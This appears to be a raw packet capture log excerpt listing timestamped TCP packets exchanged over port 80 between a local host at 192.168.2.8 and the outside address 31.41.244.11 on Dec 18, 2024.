                                                                                                                                                                                          Dec 18, 2024 09:07:39.300156116 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.300224066 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.300345898 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.301393986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.301563025 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.301603079 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.301898003 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.302779913 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.302843094 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.302874088 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.303009987 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.304311991 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.304322958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.304374933 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.305545092 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.305614948 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.305650949 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.305701971 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.307035923 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.307051897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.307100058 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.307133913 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.308240891 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.308295965 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.308623075 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.308682919 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.309581995 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.309643984 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.309726000 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.309808016 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.310945034 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.311013937 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.311115026 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.311244011 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.312489033 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.312570095 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.312608957 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.312750101 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.313918114 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.313987017 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.314213037 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.314261913 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.315083981 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.315165043 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.315248966 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.315344095 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.316452980 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.316466093 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.316525936 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.317749977 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.317815065 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.317922115 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.317991972 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.319137096 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.319211960 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.319292068 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.319341898 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.320530891 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.320543051 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.320584059 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.320617914 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.321898937 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.321965933 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.322025061 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.322202921 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.323216915 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.323281050 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.323359013 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.323431015 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.324604988 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.324657917 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.324672937 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.324757099 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.325987101 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.326028109 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.326056957 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.326092005 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.327250957 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.327323914 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.327344894 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.327378035 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.328682899 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.328741074 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.328825951 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.328980923 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.330049038 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.330095053 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.330127001 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.330158949 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.331384897 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.331495047 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.331504107 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.331545115 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.332707882 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.333000898 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.333030939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.333113909 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.334053040 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.334192038 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.334259987 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.335491896 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.335535049 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.335593939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.336855888 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.336915970 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454056025 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454092979 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454296112 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454771042 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454802036 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454848051 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.454885006 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.455626011 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.455904961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.455949068 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.456995964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.457006931 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.457051039 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.458087921 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.458101988 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.458148003 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.459367037 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.459386110 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.459417105 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.459448099 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.460179090 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.460190058 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.460232019 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.461251020 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.461337090 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.461385012 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.462279081 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.462323904 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.462390900 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.463479042 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.463505983 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.463551044 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.463561058 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.463610888 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.464576960 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.464622021 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.464663029 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.464701891 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.465595961 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.465640068 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.465724945 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.465785027 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.466739893 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.466814995 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.466869116 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.467817068 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.467897892 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.467959881 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.468900919 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.468913078 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.468945026 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.468981981 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.470057964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.470079899 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.470118046 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.470118046 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.471148968 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.471199989 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.471285105 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.471373081 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.472299099 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.472354889 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.472404003 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.473362923 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.473377943 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.473424911 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.474438906 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.474486113 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.474562883 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.475502014 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.475572109 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.475583076 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.475621939 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.476618052 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.476799011 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.476841927 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.477714062 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.477765083 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.477860928 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.478935003 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.478974104 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.478976011 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.479494095 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.480118990 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.480381966 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.480427980 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.481074095 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.481153011 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.481194973 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.482115984 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.482167959 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.482280016 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.483325958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.483355045 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.483370066 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.483500004 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.484325886 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.484440088 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.484488010 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.485445976 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.485502958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.485552073 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.486530066 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.486576080 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.486640930 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.487497091 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.487621069 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.487668037 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.487741947 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.487807989 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.488739014 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.488792896 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.488831997 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.489592075 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.489862919 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.489908934 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.489984035 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.490026951 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.490964890 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.491012096 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.491055012 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.491097927 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.492321968 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.492367983 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.492512941 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.492559910 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.493666887 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.493784904 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.493832111 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.495008945 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.495120049 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.495168924 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.495970964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.496119022 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.496172905 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.496773958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.496819019 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.496841908 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.497570992 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.497622013 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.497663975 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.498627901 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.498795986 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.498956919 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.499025106 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.500118971 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.500154018 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.500221014 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.500874996 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.500921011 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.501027107 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.502079964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.502127886 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.502139091 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.503065109 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.503118038 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.503211975 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.503259897 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.504196882 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.504306078 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.504359007 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.505589008 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.505760908 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.505811930 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.507100105 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.507148027 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.507236958 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.507502079 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.508735895 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.508784056 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.508862019 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.508907080 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.510288954 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.510354996 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.510530949 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.510580063 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.511679888 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.511918068 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.511970997 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.512809038 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.512964964 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.513022900 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.513600111 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.514319897 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.644962072 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645023108 CET804972431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645026922 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645473003 CET4972480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:39.645505905 CET804972431.41.244.11192.168.2.8
